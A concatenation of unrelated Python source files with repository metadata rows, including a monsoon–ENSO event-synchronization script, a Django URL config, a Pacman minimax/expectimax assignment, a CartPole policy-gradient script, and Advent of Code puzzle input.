dismr_anom = np.zeros((dismr.shape[0]))
dismr_std = np.zeros((dismr.shape[0]))
    dismr_anom[0:n//2] = ( dismr[0:n//2] - np.mean(dismr[0:n]) )/np.std(dismr[0:n])
    dismr_anom[dismr.shape[0]-n//2:] = ( dismr[dismr.shape[0]-n//2:] - np.mean(dismr[dismr.shape[0]-n:]) )/np.std(dismr[dismr.shape[0]-n:])
    #print(dismr_anom)
    dismr_std[0:n//2] = np.std(dismr[0:n])
    dismr_std[dismr.shape[0]-n//2:] = np.std(dismr[dismr.shape[0]-n:])
    for i in range(n//2, dismr.shape[0]-n//2):
        dismr_anom[i] = (dismr[i] - np.mean(dismr[i-n//2:i+n//2]))/np.std(dismr[i-n//2:i+n//2])
        dismr_std[i] = np.std(dismr[i-n//2:i+n//2])
return dismr_anom, dismr_std
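# Reading the function above: each sample is z-scored against a sliding window of n (=360 monthly
# steps, i.e. 30 years); the first and last n/2 samples fall back to the leading/trailing window.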
def EventSync(es1, es2, taumax):
"""
Compute non-vectorized event synchronization
:type es1: 1D Numpy array
:arg es1: Event series containing '0's and '1's
:type es2: 1D Numpy array
:arg es2: Event series containing '0's and '1's
:float return: Event synchronization es2 to es1
"""
ex = np.arange(len(es1))[es1 == 1]
ey = np.arange(len(es2))[es2 == 1]
lx = len(ex)
ly = len(ey)
count = 0
if lx!=0 and ly!=0:
for m in range(1, lx-1):
for n in range(1, ly-1):
dst = ex[m] - ey[n]
if abs(dst) > taumax:
continue
elif dst == 0:
count += 0.5
continue
# finding the dynamical delay tau
tmp = ex[m+1] - ex[m]
if tmp > ex[m] - ex[m-1]:
tmp = ex[m] - ex[m-1]
tau = ey[n+1] - ey[n]
if tau > ey[n] - ey[n-1]:
tau = ey[n] - ey[n-1]
if tau > tmp:
tau = tmp
tau = tau / 2
if dst > 0 and dst <= tau:
count += 1
#print("count = ",count)
#print("Q = ",np.sqrt((lx-2) * (ly-2)))
#print("lx,ly,Q =",lx,ly,count)
if lx!=0 and ly!=0:
return count / np.sqrt((lx) * (ly))
#return count / np.sqrt((lx-2) * (ly-2))
else:
return 0.0
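# A small usage sketch for EventSync on toy binary event series (illustrative values only):
#   es_a = np.array([0, 1, 0, 0, 1, 0, 0, 0, 1, 0])
#   es_b = np.array([0, 0, 1, 0, 0, 1, 0, 0, 0, 1])
#   q_ab = EventSync(es_a, es_b, 2)   # synchronisation of events in es_b to events in es_a
#   q_ba = EventSync(es_b, es_a, 2)
#   q = q_ab + q_ba                   # symmetrised strength, as used in the windowed loop below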
def my_shuffle(array):
random.shuffle(array)
return array
# In[12]:
ismr_anom, ismr_std = moving_average_anomaly(ismr)
nino3_anom, nino3_std = moving_average_anomaly(nino3)
es_ismr_d = np.zeros((ismr_anom.shape[0]))
es_ismr_f = np.zeros((ismr_anom.shape[0]))
es_nino3_en = np.zeros((nino3_anom.shape[0]))
es_nino3_ln = np.zeros((nino3_anom.shape[0]))
es_ismr_f[ismr_anom>1.0] = 1.0
es_ismr_d[ismr_anom<-1.0] = 1.0
es_nino3_en[nino3_anom>0.5] = 1.0
es_nino3_ln[nino3_anom<-0.5] = 1.0
taumax = 24
# In[13]:
Q_hist_ed = np.zeros((es_ismr_d.shape[0]-taumax))
Q_hist_lf = np.zeros((es_ismr_d.shape[0]-taumax))
es_ismr_d_mc = my_shuffle(es_ismr_d)
es_ismr_f_mc = my_shuffle(es_ismr_f)
for i in range(es_ismr_d.shape[0]-taumax):
Q_hist_12 = EventSync(es_ismr_d[i:i+taumax], es_nino3_en[i:i+taumax], taumax)
Q_hist_21 = EventSync(es_nino3_en[i:i+taumax], es_ismr_d[i:i+taumax],taumax)
Q_hist_ed[i] = Q_hist_12 + Q_hist_21
Q_hist_12 = EventSync(es_ismr_f[i:i+taumax], es_nino3_ln[i:i+taumax], taumax)
Q_hist_21 = EventSync(es_nino3_ln[i:i+taumax], es_ismr_f[i:i+taumax],taumax)
Q_hist_lf[i] = Q_hist_12 + Q_hist_21
# In[15]:
np.savetxt("Q_hist_ed.csv", Q_hist_ed, delimiter=",")
np.savetxt("Q_hist_lf.csv", Q_hist_lf, delimiter=",")
# In[27]:
| [
"manmeet20singh11@gmail.com"
] | manmeet20singh11@gmail.com |
513abcefad476ebd3b58a2abd88cce66f1f8ecbf | 2880756e65bc323e89f1c9e873af10170720841a | /src/vidtrest/apps/vid/urls.py | d896491578ac6cf8faa2fed9d6c52520ee8dc407 | [] | no_license | rosscdh/vidtrest | 91419474a59cd5351ebacb5c8b3ec441a5e97a8c | 03e4188d1333361ebf5af856c71a41081e5b4fd0 | refs/heads/main | 2023-06-26T16:45:24.984152 | 2023-06-25T00:21:13 | 2023-06-25T00:21:13 | 91,779,356 | 0 | 0 | null | 2021-11-08T15:17:34 | 2017-05-19T07:39:04 | CSS | UTF-8 | Python | false | false | 261 | py | # -*- coding: utf-8 -*-
from django.urls import include, re_path
from . import views
urlpatterns = [
re_path(r'^search/$', views.VidSearchView.as_view(), name='search'),
re_path(r'^(?P<uuid>[0-9a-z-]+)/$', views.DetailView.as_view(), name='detail'),
] | [
"r.crawford@example.com"
] | r.crawford@example.com |
03a9dfea771fb783bbd10950701d0049f6fa4eb3 | b76e39e535499704368eddc26237dc0016ef7d06 | /RailRites/allsiemensdriveprocessing.py | a9963fed91147d1a03a027d0f56cd7e4d6f3f9fa | [] | no_license | BUBAIMITRA2018/castersimulation | 0532e53df7d346c2824e577cc91cd0ac2ce4694c | eca5fddff5c0f33f785168f6b1e9f572c1622be0 | refs/heads/master | 2022-12-10T02:45:04.207196 | 2020-09-09T05:35:54 | 2020-09-09T05:35:54 | 260,110,682 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,309 | py |
from observable import *
import logging
from clientcomm_v1 import *
from readgeneral_v2 import *
logger = logging.getLogger("main.log")
threadlist = []
class AreaObserver:
def __init__(self, observable):
observable.register_observer(self)
def notify(self, *args, **kwargs):
for item in args[0]:
try:
# threading = multiprocessing.Process(target=self.callmotor2dprocess,args=(item))
thread = threading.Thread(target=self.callsiemendsdriveprocess, args=[item])
threadlist.append(thread)
except Exception as e:
level = logging.INFO
messege = "NOTIFY" + ":" + " Exception rasied(process): " + str(e.args) + str(e)
logger.log(level, messege)
def callsiemendsdriveprocess(self, item):
while True:
try:
item.driveprocess
except Exception as e:
level = logging.INFO
messege = "calldriveprocess" + ":" + " Exception rasied(process): " + str(e.args) + str(e)
logger.log(level, messege)
def __init__(self, alldevices, filename):
self.subject = Observable()
self.alldevices = alldevices
self.client = Communication()
self.sta_con_plc = self.client.opc_client_connect(filename)
self.observer = AreaObserver(self.subject)
self.readgeneral = ReadGeneral(self.sta_con_plc)
def process(self, filename):
try:
for area, devices in readkeyandvalues(self.alldevices):
areavalue = self.readgeneral.readsymbolvalue(area, 'S7WLBit', 'PA')
if areavalue == 1:
self.observer.notify(devices, filename)
for j in threadlist:
j.start()
except Exception as e:
level = logging.INFO
messege = "PROCCESS" + ":" + " Exception rasied(process): " + str(e.args) + str(e)
logger.log(level, messege)
def readkeyandvalues(alldevice):
siemensdrivedictionary = alldevice.allsiemensdrives.dictionary
areas = list(siemensdrivedictionary.keys())
n = 0
while n < len(areas):
area = areas[n]
devices = siemensdrivedictionary[area]
yield area,devices
n = n + 1
| [
"subrata.mitra@sms-group.com"
] | subrata.mitra@sms-group.com |
a12bb15a56a2b1eeb046125d82fd52c32eab9ff4 | 50e9f616351ef8e0a78d62109f69b4b026a0cd63 | /ParticleSegmentation/predict.py | e96d3d94f366959057fc4b17a58700746aa69e83 | [
"MIT"
] | permissive | Liushuhuibupt/PariticleSegmentation | c45318d628f4d2af2b939c748f78566d849c731b | 8606012907c498227c2695f3c963c116ae6fba66 | refs/heads/main | 2023-06-26T05:10:04.333984 | 2021-07-28T01:27:51 | 2021-07-28T01:27:51 | 367,369,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,745 | py | # -*- coding: utf-8 -*-
from nets.pspnet import mobilenet_pspnet
import numpy as np
import random
import copy
import os
from PIL import Image
import cv2
import matplotlib.pyplot as plt
#class_colors = [[0,0,0],[0,255,0]]
NCLASSES = 2
HEIGHT = 256
WIDTH = 256
model = mobilenet_pspnet(n_classes=NCLASSES,input_height=HEIGHT, input_width=WIDTH)
model.load_weights("./logs/ep100-loss0.004-val_loss0.060.h5")
imgs = os.listdir("./img/")
#imgs = os.listdir("C:/Users/David/Workspaces/liushuhui_1_david_lw-Semantic-Segmentation-master/Semantic-Segmentation/pspnet_Mobile/dataset2/image")
for png in imgs:
img = cv2.imread("./img/"+png,cv2.IMREAD_UNCHANGED)
#img = cv2.imread("./img/"+png)
old_img = img.copy()
#old_img=cv2.resize(old_img,(WIDTH,HEIGHT))
#img = img[:,:,0]
# = img.shape[0]
#orininal_w = img.shape[1]
#img.resize((WIDTH,HEIGHT))
#img = np.array(img)
img = img/255.
img = img.reshape(-1,HEIGHT,WIDTH,1)
pr = (model.predict(img)[1])[0]
#['predictRegion'][0]
pr = pr.reshape((int(HEIGHT), int(WIDTH),NCLASSES)).argmax(axis=-1)
plt.imshow(pr)
seg_img = (np.uint8(pr*255.))
#seg_img.resize(orininal_w,orininal_h)
#seg_img=cv2.resize(seg_img,(orininal_w,orininal_h))
#color_img = cv2.cvtColor(old_img,cv2.COLOR_Gra2)
contours, hierarchy = cv2.findContours(seg_img,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
for c in contours:
cv2.drawContours(old_img, [c], -1, (255, 0, 0), 1)
cv2.imwrite("./img_out_contour_diceloss/"+png,old_img)
# img = Image.open("./img/"+png)
# #img = Image.open(("C:/Users/David/Workspaces/liushuhui_1_david_lw-Semantic-Segmentation-master/Semantic-Segmentation/pspnet_Mobile/dataset2/image/"+jpg)
# old_img = copy.deepcopy(img)
# orininal_h = np.array(img).shape[0]
# orininal_w = np.array(img).shape[1]
#
# img = img.resize((WIDTH,HEIGHT))
# img = np.array(img)
# img = img/255.
# img = img.reshape(-1,HEIGHT,WIDTH,1)
# pr = model.predict(img)[0]
#
# pr = pr.reshape((int(HEIGHT), int(WIDTH),NCLASSES)).argmax(axis=-1)
#
#
##
## seg_img = np.zeros((int(HEIGHT/4), int(WIDTH/4),3))
## colors = class_colors
##
## for c in range(NCLASSES):
## seg_img[:,:,0] += ( (pr[:,: ] == c )*( colors[c][0] )).astype('uint8')
## seg_img[:,:,1] += ((pr[:,: ] == c )*( colors[c][1] )).astype('uint8')
## seg_img[:,:,2] += ((pr[:,: ] == c )*( colors[c][2] )).astype('uint8')
##
# seg_img = Image.fromarray(np.uint8(pr*255.)).resize((orininal_w,orininal_h))
#
# image = Image.blend(old_img,seg_img,0.3)
# #image = seg_img
# image.save("./img_out_blend/"+png)
| [
"noreply@github.com"
] | Liushuhuibupt.noreply@github.com |
25de4dae37a97d59eb5f38d7d423d4cc308798f7 | ee9c66231d6ff744e3757d5b08dc9916fa0cd5df | /utils/file_obj.py | 3792fbbaf198ed36488c6894ffc07eaacf7fb290 | [] | no_license | sidra-asa/Quark_api | f8eaee3863c30384f0d260d61b627c0375b60c41 | 28c7ef58689f0c4aeb943c0d408e9cda037d9c61 | refs/heads/master | 2022-12-08T14:18:53.111983 | 2019-10-18T01:59:59 | 2019-10-18T01:59:59 | 194,219,721 | 1 | 0 | null | 2022-12-08T05:51:56 | 2019-06-28T06:29:42 | Python | UTF-8 | Python | false | false | 1,274 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import binascii
import hashlib
import pydeep
import logging
class File:
"""File hashes"""
def __init__(self, data):
self.result = {}
self._file_data = data
self.calc_hashes()
logging.debug("file hashes: {0}".format(self.result))
def calc_hashes(self):
data = self._file_data
crc = 0
md5 = hashlib.md5()
sha1 = hashlib.sha1()
sha256 = hashlib.sha256()
sha512 = hashlib.sha512()
crc = binascii.crc32(data, crc)
md5.update(data)
sha1.update(data)
sha256.update(data)
sha512.update(data)
self.result['md5'] = md5.hexdigest()
self.result['sha1'] = sha1.hexdigest()
self.result['sha256'] = sha256.hexdigest()
self.result['sha512'] = sha512.hexdigest()
self.result['crc32'] = "".join("%02X" % ((crc >> i) & 0xff) for i in [24, 16, 8, 0])
self.result['ssdeep'] = self._get_ssdeep()
def _get_ssdeep(self):
try:
return pydeep.hash_buf(self._file_data).decode()
except Exception as e:
logging.warn(f"Error: {e}")
return None
@property
def all_result(self):
return self.result
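# Minimal usage sketch (the file path is illustrative, not part of this module):
#   with open("sample.bin", "rb") as fh:
#       hashes = File(fh.read()).all_result
#   # -> {'md5': ..., 'sha1': ..., 'sha256': ..., 'sha512': ..., 'crc32': ..., 'ssdeep': ...}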
| [
"sasakikung@gmail.com"
] | sasakikung@gmail.com |
6d6a109ccbf23460c3ad9eb778116b871ffe7a8b | a60a742c3856cb60560cc83a668f7dbbdc93b222 | /multiAgents.py | 2a1a95f496edaa56e5f1ca371f573e05a5ab32c7 | [] | no_license | SplashEzer00/CS188-The-Pac-Man-Projects | 906966ad0c371c16b7acd88e63f23f40514dcca6 | ee2576a14efd73062caf57caba7f35981d489544 | refs/heads/main | 2023-08-15T06:55:24.346716 | 2021-09-24T13:34:51 | 2021-09-24T13:34:51 | 406,756,692 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,610 | py | # multiAgents.py
# --------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
from util import manhattanDistance
from game import Directions
import random, util
from game import Agent
class ReflexAgent(Agent):
"""
A reflex agent chooses an action at each choice point by examining
its alternatives via a state evaluation function.
The code below is provided as a guide. You are welcome to change
it in any way you see fit, so long as you don't touch our method
headers.
"""
def getAction(self, gameState):
"""
        You do not need to change this method, but you're welcome to.  getAction chooses among the best options according to the evaluation function.
        Just like in the previous project, getAction takes a GameState and returns some Directions.X for some X in the set {NORTH, SOUTH, WEST, EAST, STOP}.
"""
# Collect legal moves and successor states
legalMoves = gameState.getLegalActions()
# Choose one of the best actions
scores = [self.evaluationFunction(gameState, action) for action in legalMoves]
bestScore = max(scores)
bestIndices = [index for index in range(len(scores)) if scores[index] == bestScore]
chosenIndex = random.choice(bestIndices) # Pick randomly among the best
"如果您愿意,可以在这里添加更多代码"
return legalMoves[chosenIndex]
def evaluationFunction(self, currentGameState, action):
"""
        Design a better evaluation function here.
        The evaluation function takes the current and proposed successor GameStates (pacman.py) and returns a number, where higher numbers are better.
        The code below extracts some useful information from the state, such as the remaining food (newFood) and the Pacman position after moving (newPos).
        newScaredTimes holds the number of moves that each ghost will remain scared because Pacman ate a power pellet.
"""
# Useful information you can extract from a GameState (pacman.py)
        successorGameState = currentGameState.generatePacmanSuccessor(action)  # generate the successor state after the specified Pacman move
        newPos = successorGameState.getPacmanPosition()  # Pacman's position after the move
        newFood = successorGameState.getFood()
        newGhostStates = successorGameState.getGhostStates()  # the ghost states
        newScaredTimes = [ghostState.scaredTimer for ghostState in newGhostStates]
        # Mycode
        newFood = successorGameState.getFood().asList()  # positions of the remaining food
        nearestFood = float('inf')  # initialise the nearest-food distance to +infinity
        for food in newFood:
            nearestFood = min(nearestFood, manhattanDistance(newPos, food))  # keep the smaller of the current minimum and the Manhattan distance to this food
        for ghost in successorGameState.getGhostPositions():
            if (manhattanDistance(newPos, ghost) < 3):  # if a ghost is within distance 3, return -infinity
                return -float('inf')
        return successorGameState.getScore() + 1.0/nearestFood  # the closer the nearest food, the higher the evaluation
def scoreEvaluationFunction(currentGameState):
"""
    This default evaluation function just returns the score of the state.  The score is the same one displayed in the Pacman GUI.
    This evaluation function is meant for use with adversarial search agents (not reflex agents).
"""
return currentGameState.getScore()
class MultiAgentSearchAgent(Agent):
"""
    This class provides some common elements to all of your
    multi-agent searchers.  Any methods defined here will be available
    to the MinimaxPacmanAgent, AlphaBetaPacmanAgent and ExpectimaxPacmanAgent.
    You *do not* need to make any changes here, but you can if you want to add functionality to all your adversarial search agents.  Please do not remove anything, however.
    Note: this is an abstract class: one that should not be instantiated.  It is only partially specified and designed to be extended.  Agent (game.py) is another abstract class.
"""
def __init__(self, evalFn = 'scoreEvaluationFunction', depth = '2'):
self.index = 0 # Pacman is always agent index 0
self.evaluationFunction = util.lookup(evalFn, globals())
self.depth = int(depth)
class MinimaxAgent(MultiAgentSearchAgent):
"""
    Your minimax agent (question 2)
    """
    """
    Returns the minimax action from the current gameState using self.depth and self.evaluationFunction.
    Below are some method calls that might be useful when implementing minimax.
    gameState.getLegalActions(agentIndex):
    agentIndex = 0 means Pacman, an index >= 1 means a ghost (there may be more than one ghost)
    gameState.generateSuccessor(agentIndex, action):
    Returns the successor game state after an agent takes an action
    gameState.getNumAgents():
    Returns the total number of agents in the game
    gameState.isWin():
    Returns whether the game state is a winning state
    gameState.isLose():
    Returns whether the game state is a losing state
"""
def getAction(self, gameState):
actions = gameState.getLegalActions(0)
        return max(actions, key=lambda x: self.minimaxSearch(gameState.generateSuccessor(0, x), 1))  # choose Pacman's best action according to minimax
    def minimaxSearch(self, gameState, turn):  # the minimax algorithm
        numOfAgents = gameState.getNumAgents()  # total number of agents in the game
        agentIndex = turn % numOfAgents  # whose turn it is in the rotation
        depth = turn // numOfAgents  # current search depth
        if gameState.isWin() or gameState.isLose() or depth == self.depth:
            return self.evaluationFunction(gameState)  # evaluate the state
        actions = gameState.getLegalActions(agentIndex)  # legal actions for the current agent
        evals = [self.minimaxSearch(gameState.generateSuccessor(agentIndex, action), turn + 1) for action in actions]  # recurse
        if agentIndex > 0:  # ghosts minimise, Pacman maximises (one-vs-many minimax)
return min(evals)
else:
return max(evals)
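# How the single `turn` counter encodes both mover and depth (e.g. with 3 agents: Pacman + 2 ghosts):
# turn 0 -> Pacman at depth 0, turns 1-2 -> the two ghosts at depth 0, turn 3 -> Pacman at depth 1, ...
# so agentIndex = turn % numOfAgents and depth = turn // numOfAgents.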
class AlphaBetaAgent(MultiAgentSearchAgent):
"""
    Your minimax agent with alpha-beta pruning (question 3)
    Returns the minimax action using self.depth and self.evaluationFunction
"""
def getAction(self, gameState):
        actions = gameState.getLegalActions(0)  # legal actions
        alpha, beta = -float('inf'), float('inf')  # initialise alpha and beta
        vals = []
        for action in actions:
            val = self.alphabetaSearch(gameState.generateSuccessor(0, action), 1, alpha, beta)
            alpha = max(alpha, val)  # keep the best value seen so far
            vals.append(val)  # collect the values
        for i in range(len(actions)):
            if alpha == vals[i]:
                return actions[i]  # return the best action
    def alphabetaSearch(self, gameState, turn, alpha, beta):
        numOfAgents = gameState.getNumAgents()  # number of agents
        agentIndex = turn % numOfAgents  # whose turn it is
        depth = turn // numOfAgents  # current search depth
        if gameState.isWin() or gameState.isLose() or depth == self.depth:  # terminal condition
            return self.evaluationFunction(gameState)
        actions = gameState.getLegalActions(agentIndex)  # legal actions for this agent
        if agentIndex == 0: val = -float('inf')  # initialise val depending on whether this is a max (Pacman) or min (ghost) node
        else: val = float('inf')
        for action in actions:  # expand each action
            successor = gameState.generateSuccessor(agentIndex, action)
            # alpha-beta algorithm
            if agentIndex > 0:
                val = min(val, self.alphabetaSearch(successor, turn + 1, alpha, beta))  # update the min value
                if val < alpha: return val  # prune
                else: beta = min(beta, val)
            else:
                val = max(val, self.alphabetaSearch(successor, turn + 1, alpha, beta))  # update the max value
                if val > beta: return val  # prune
                else: alpha = max(alpha, val)
return val
class ExpectimaxAgent(MultiAgentSearchAgent):
"""
    Your expectimax agent (question 4)
    Returns the expectimax action using self.depth and self.evaluationFunction
    All ghosts should be modelled as choosing uniformly at random from their legal moves. Monte Carlo tree search?
"""
def getAction(self, gameState):
actions = gameState.getLegalActions(0)
return max(actions, key=lambda x: self.expectimaxSearch(gameState.generateSuccessor(0, x), 1))
def expectimaxSearch(self, gameState, turn):
        numOfAgents = gameState.getNumAgents()  # number of agents
        agentIndex = turn % numOfAgents  # whose turn it is
        depth = turn // numOfAgents  # current search depth
        if gameState.isWin() or gameState.isLose() or depth == self.depth:  # terminal condition
            return self.evaluationFunction(gameState)  # return the evaluation
        actions = gameState.getLegalActions(agentIndex)  # legal actions for this agent
        evals = [self.expectimaxSearch(gameState.generateSuccessor(agentIndex, action), turn + 1) for action in actions]  # recurse
        # Monte Carlo tree search
        if agentIndex > 0:
            return sum(evals) * 1.0 / len(evals)  # return the expected (average) value
        return max(evals)  # return the maximum value
def betterEvaluationFunction(currentGameState):
"""
    Your extreme ghost-hunting, pellet-nabbing, food-gobbling, unstoppable evaluation function (question 5).
"""
if currentGameState.isLose(): return - float('inf')
if currentGameState.isWin(): return float('inf')
    foods = currentGameState.getFood()  # food positions
    ghostStates = currentGameState.getGhostStates()  # ghost states
    pacmanPostion = currentGameState.getPacmanPosition()  # Pacman's position
    nearestFood = min(manhattanDistance(food, pacmanPostion) for food in foods.asList())  # Manhattan distance to the nearest food
    coverMe = sum([(manhattanDistance(ghost.getPosition(), pacmanPostion) < 3) for ghost in ghostStates])  # number of ghosts within distance 3
    scareMe = sum([(ghost.scaredTimer == 0) for ghost in ghostStates])  # number of ghosts that are not scared
    # the smaller the distance to the nearest food, the fewer the nearby ghosts, and the longer ghosts stay scared, the larger the value this evaluation function returns
return currentGameState.getScore() + 1.0 / nearestFood + 1.0 * coverMe + 1.0 / (scareMe + 0.1)
# Abbreviation
better = betterEvaluationFunction | [
"noreply@github.com"
] | SplashEzer00.noreply@github.com |
698189883b7b106d39274401989489fd5d95863e | 030ce47c6bd752807f14dc0c058f4b2395fcb7a2 | /CartPole_v0/PolicyGradient.py | 114026f09677ffb941f476f2c8aad12778e86185 | [] | no_license | chiaminchuang/ReinforcementLearning-GYM | c7b8553443c929eb338d96cafed136e25f99c4ce | c0601786ceab1a4dec51dffb374b8b770f0f8590 | refs/heads/master | 2020-06-16T14:45:34.487065 | 2019-07-07T05:22:46 | 2019-07-07T05:22:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,882 | py | import tensorflow as tf
import gym
import numpy as np
env = gym.make('CartPole-v0')
num_actions = env.action_space.n
num_inputs = env.observation_space.shape[0]
def create_model():
hidden_units = [4]
x = tf.placeholder(tf.float32, shape=(None, num_inputs))
y = tf.placeholder(tf.int32, shape=(None, ))
h = x
for units in hidden_units:
h = tf.keras.layers.Dense(units=units, activation='relu')(h) # (batch_size, hidden_units)
# h = tf.keras.layers.Dropout(0.5)(h)
o = tf.keras.layers.Dense(units=num_actions, activation=None)(h) # (batch_size, num_actions)
probabilities = tf.keras.activations.softmax(o) # (batch_size, num_actions)
action = tf.multinomial(probabilities, num_samples=1) # (batch_size, 1)
y_onehot = tf.one_hot(y, depth=num_actions) # (batch_size, num_actions)
cross_entropy = tf.losses.softmax_cross_entropy(y_onehot, o) # (batch_size, )
loss = tf.reduce_mean(cross_entropy) # ()
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
gradients_and_variables = optimizer.compute_gradients(loss)
gradients = []
gradient_placeholders = []
grads_and_vars_feed = []
for gradient, variable in gradients_and_variables:
gradients.append(gradient)
gradient_placeholder = tf.placeholder(tf.float32, shape=gradient.get_shape())
gradient_placeholders.append(gradient_placeholder)
grads_and_vars_feed.append((gradient_placeholder, variable))
training_op = optimizer.apply_gradients(grads_and_vars_feed)
return x, y, action, gradients, loss, gradient_placeholders, training_op
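# Sketch of why gradients go through placeholders above: compute_gradients yields the cross-entropy
# gradients for each sampled step; the training loop below collects them during rollouts, re-weights
# them by the step's reward, averages, feeds the result back via gradient_placeholders and only then
# runs apply_gradients -- a REINFORCE-style weighting of the policy gradient.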
def helper_discount_rewards(rewards, discount_rate):
'''
Parameters:
rewards: (game_steps, ). reward for each round
Return:
discounted_rewards (game_steps, ). discounted reward for each round
'''
discounted_rewards = np.zeros(len(rewards))
cumulative_rewards = 0
for step in reversed(range(len(rewards))):
cumulative_rewards = rewards[step] + cumulative_rewards * discount_rate
discounted_rewards[step] = cumulative_rewards
return discounted_rewards
def discount_and_normalize_rewards(all_rewards, discount_rate):
'''
Parameters:
all_rewards: (num_game_rounds, game_steps). rewards for each iteration.
Return:
all_discounted_rewards: (num_game_rounds, game_steps). discounted rewards for each iteration.
'''
# calculate discounted rewards
all_discounted_rewards = []
for rewards in all_rewards:
all_discounted_rewards.append(helper_discount_rewards(rewards, discount_rate))
# normalize discounted rewards
flat_rewards = np.concatenate(all_discounted_rewards) # (num_game_rounds, game_steps)
reward_mean = flat_rewards.mean()
reward_std = flat_rewards.std()
return [(discounted_rewards - reward_mean) / reward_std for discounted_rewards in all_discounted_rewards]
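# Quick worked example of the discounting above (illustrative numbers):
#   helper_discount_rewards([1, 1, 1], 0.9) -> [2.71, 1.9, 1.0]
#   (each step's value is its own reward plus 0.9 times the next step's discounted value);
#   discount_and_normalize_rewards then shifts/scales these to zero mean and unit std across all games.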
if __name__ == '__main__':
num_game_rounds = 10
max_game_steps = 1000
num_iterations = 300
discount_rate = 0.9
########## Create Model ##########
model_x, model_y, model_action, model_gradients, model_loss, model_gradient_placeholders, model_training_op = create_model()
########## Train Model ##########
with tf.Session() as sess:
initializer = tf.global_variables_initializer()
saver = tf.train.Saver()
sess.run(initializer)
for iteration in range(num_iterations):
print('On Iterations: {}'.format(iteration))
all_rewards = []
all_gradients = []
all_x = []
all_y = []
for game in range(num_game_rounds):
                current_rewards = []
                current_gradients = []
                x = []  # per-game observations
                y = []  # per-game sampled actions
observations = env.reset()
score = 0
for step in range(max_game_steps):
# env.render()
                    # sample an action first, then evaluate the gradients using that action as the label
                    action = sess.run(model_action, feed_dict={model_x: observations.reshape((1, num_inputs))})
                    gradients = sess.run(model_gradients, feed_dict={model_x: observations.reshape((1, num_inputs)), model_y: action.ravel()})
observations, reward, done, info = env.step(action[0][0])
current_rewards.append(reward)
current_gradients.append(gradients)
x.append(observations)
y.append(action[0][0])
score += reward
if done:
break
print(score)
all_rewards.append(current_rewards)
all_gradients.append(current_gradients)
all_x.append(x)
all_y.append(y)
all_discounted_rewards = discount_and_normalize_rewards(all_rewards, discount_rate)
            feed_dict = {model_y: np.concatenate(all_y)}
for var_index, gradient_placeholder in enumerate(model_gradient_placeholders):
# mean_gradients = np.sum([(np.sum(rewards) - 70) * all_gradients[game_index][step][var_index]
# for game_index, rewards in enumerate(all_discounted_rewards)
# for step, reward in enumerate(rewards)], axis=0) / num_game_rounds
mean_gradients = np.mean([reward * all_gradients[game_index][step][var_index]
for game_index, rewards in enumerate(all_rewards)
for step, reward in enumerate(rewards)], axis=0)
# print(mean_gradients)
feed_dict[gradient_placeholder] = mean_gradients
sess.run(model_training_op, feed_dict=feed_dict)
saver.save(sess, 'models/PG/model')
avg_score = 0
for i in range(20):
observations = env.reset()
with tf.Session() as sess:
new_saver = tf.train.Saver()
new_saver.restore(sess, 'models/PG/model')
score = 0
for x in range(500):
env.render()
fetches = [model_action]
feed_dict = {model_x: observations.reshape((1, num_inputs))}
action_val = sess.run(fetches, feed_dict)
# print(action_val)
observation, reward, done, info = env.step(action_val[0][0])
score += reward
if done:
print('Your Score Is: {}'.format(score))
avg_score += score
break
print('Average Score: {}'.format(avg_score / 20))
| [
"noreply@github.com"
] | chiaminchuang.noreply@github.com |
4e964a168e5f724e7c1aec26b7edf1bea0d54e5f | 2aa70d0c4e7108b3c6cf31d65b82d09036538cc3 | /2020/day_06.py | b27403dca973fdaef8ba5513a473f79282c43cec | [] | no_license | charlch/Advent-of-Code | 123400a2a14c3c4070a5ffb827a2a89d8f7296d5 | cdf4247ca6d2460a53ee90a6bba5e218e2163652 | refs/heads/master | 2022-12-22T01:54:36.195014 | 2022-12-18T12:07:55 | 2022-12-18T12:07:55 | 225,406,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,893 | py | print("Day 6")
data="""abc
a
b
c
ab
ac
a
a
a
a
b"""
data="""lznroxbqymvfijpwkec
gljkpwyvsbmroziefnqxc
bmkiewyxjfzqrocnlpv
ibewnmlkzfcrjyvxopq
fkmxpbvjiwlrzocqyne
khicbaxyvmlgorz
baonifgtlkrmcxhzv
albmyvgrihxkzoc
vmcizkpglyoarxbh
mxrufizdpe
tmowfuynajqlivhgskrcb
xwqpuirsmaoyldgbzft
odlyigpqsmbvtzauxr
aymdshiprbguoqzxtl
zdylrimtjpxeosaqubg
tlbzigadxkoqnurcsmyp
jadtruwhinqog
vitasqdnoeghjwuz
aigqhdowjsetun
unhqwogdjait
om
oep
vknfwpuzisty
tzifluwnspv
wispvfntuz
znupcl
lcnpuz
lkuznecp
pczunlx
nzubclp
cunfkismz
lbhypaje
ro
myo
ngwefiutvszxbdmryocplqj
sdljcutwzfxemvgnipo
dxfvrgszlbyaunp
gzrlauvfnybps
yvpfabmuszgjrnl
nlzpfasgbyvur
lsognzftikxjbvayuh
ftxzgjaiobhuvlskny
hfuzvglsxjobayknit
nuxvtqbsaiojkhzfylg
novbjasyhkftlugxzi
vxbhjmpzsrfoankywdeiltuq
emayhruvfpsqbkxdznjtil
ikafqsbvdjymxrhueztpln
fixjrzesulhpmadkytnvbq
rkejpiztmvyxfaqbuslhnd
ejmyzlibckwoah
masohifbqjgleywcrnz
lhouzrkenvgtqwydmajs
kngayjteqsczmwdurlhbo
ptf
pzft
ptf
pstf
f
f
f
f
f
algfqpwh
pdhabkw
jyxmcrnlkadzvhuo
lokmdcvyatqengjrz
sbrynopviejlwdzmkcfa
qjl
qljv
qlj
jlq
zwvucilrjkqtaposybefhxd
yvhrnfjzudoxatpqbilcke
mhfioakqexutdybcrvljgzp
lw
